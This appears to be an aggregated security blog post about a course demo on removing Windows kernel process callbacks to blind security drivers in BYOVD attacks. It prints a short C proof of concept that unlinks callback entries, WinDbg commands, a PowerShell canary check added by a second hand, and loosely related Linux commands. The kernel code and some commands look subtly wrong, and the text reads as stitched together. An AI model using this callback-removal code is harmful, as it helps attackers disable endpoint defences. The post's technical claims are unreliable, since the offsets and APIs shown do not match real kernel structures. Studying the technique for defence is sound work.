White Knight Labs’ Offensive Development Course: Kernel Attacks Preview

White Knight Labs has released a demo showcasing their new kernel attack content as part of their Offensive Development course. The demo covers removing process callbacks to blind a driver to newly created processes, a critical technique for BYOVD (Bring Your Own Vulnerable Driver) attacks. The full content will debut at NorthSec.

Watch the Demo Here:

https://lnkd.in/eR42r97X

You Should Know:

#### **1. Understanding Process Callbacks in Windows Kernel**

Process callbacks are registered by kernel drivers (security products among them) so they are notified whenever a process is created or terminated. Attackers may unlink these callbacks so that the driver never sees newly created processes and its detection logic is blinded.

**Key Commands (WinDbg):**

```text
!process 0 0                                                                                  # List all processes
dt nt!_EPROCESS <process_address>                                                             # Examine process structure
dx -r1 (*((ntkrnlmp!_CALLBACK_OBJECT **)&nt!PspProcessType))->RegisteredCallbacks             # List process callbacks
```

#### **2. Removing Process Callbacks – Offensive Technique**

Attackers can manipulate the callback list to disable monitoring.

**Example (WinDbg/PoC Code):**

```c
#include <ntifs.h>

void RemoveProcessCallback() {
    PLIST_ENTRY callbackList = (PLIST_ENTRY)((PUCHAR)PsGetProcessType() + 0x8);
    PLIST_ENTRY entry = callbackList->Flink;
    while (entry != callbackList) {
        PLIST_ENTRY nextEntry = entry->Flink;
        RemoveEntryList(entry);
        entry = nextEntry;
    }
}
```

#### **3. Defensive Checks (Blue Team Perspective)**

Detect callback removal via kernel module integrity checks:

```text
# Check loaded drivers & callbacks (Windows)
fltmc filters
driverquery /v
```
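The commands above only list which drivers are loaded; they cannot tell you whether a driver's process-creation callback is still linked. A practical host-side check for the exact condition described in this post (a driver blinded to new processes) is a canary: spawn a harmless process with a unique marker and confirm the sensor actually logged it. The script below is an added example, not from the course or the post; it assumes Sysmon is installed and writing Event ID 1 (ProcessCreate), which Sysmon generates from its kernel driver's process-creation callback.

```powershell
# Added example (not part of the original post). Assumption: Sysmon is installed
# and its ProcessCreate events (ID 1) land in Microsoft-Windows-Sysmon/Operational.
# If the driver's process callback has been unlinked, the canary process starts
# normally but no ProcessCreate event is ever written for it.
function Test-ProcessCallbackCanary {
    param(
        [int]$TimeoutSeconds = 10
    )
    # Unique token placed on the canary's command line so the event is unambiguous.
    $marker = [guid]::NewGuid().ToString('N')
    $start  = (Get-Date).AddSeconds(-2)

    # Harmless canary: cmd.exe runs a comment and exits immediately.
    $proc = Start-Process -FilePath "$env:SystemRoot\System32\cmd.exe" `
                          -ArgumentList "/c rem $marker" `
                          -WindowStyle Hidden -PassThru
    $proc.WaitForExit()

    # Poll the Sysmon log until the matching ProcessCreate event shows up or we time out.
    $hit = $null
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    do {
        $hit = Get-WinEvent -FilterHashtable @{
                   LogName   = 'Microsoft-Windows-Sysmon/Operational'
                   Id        = 1
                   StartTime = $start
               } -ErrorAction SilentlyContinue |
               Where-Object { $_.Message -match [regex]::Escape($marker) } |
               Select-Object -First 1
        if ($hit) { break }
        Start-Sleep -Milliseconds 500
    } while ((Get-Date) -lt $deadline)

    [pscustomobject]@{
        CanaryPid     = $proc.Id
        Marker        = $marker
        CallbackFired = [bool]$hit
        Verdict       = if ($hit) { 'OK: sensor observed the canary process' }
                        else      { 'ALERT: no ProcessCreate event; callback removed or sensor down' }
    }
}

Test-ProcessCallbackCanary
```

Run it from an elevated prompt on a schedule and alert on `CallbackFired -eq $false`; a sensor that is healthy but simply not installed produces the same verdict, so treat the check as "sensor sees new processes", not as proof of a specific attack.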

**Linux Equivalent (Auditing Kernel Modules):**

```text
lsmod                         # List loaded modules
dmesg | grep -i "callback"    # Check kernel logs
```

#### **What Undercode Say:**

Kernel attacks remain a high-risk vector in offensive security. Understanding callback mechanisms is crucial for both red and blue teams. Practicing in controlled environments (e.g., Windows Kernel Debugging with WinDbg) is essential.

**Additional Commands for Research:**

```text
# Windows:
!verifier                                     # Driver Verifier checks
!drvobj <driver> 2                            # Inspect driver objects

# Linux:
cat /proc/kallsyms | grep callback            # Find callback symbols
sudo sysctl -w kernel.modules_disabled=1      # Disable module loading (defense)
```

#### **Expected Output:**

A deeper understanding of kernel callback manipulation, along with practical commands for both exploitation and defense.

**Reference:**

Reported By: Jake Mayhew – Hackers Feeds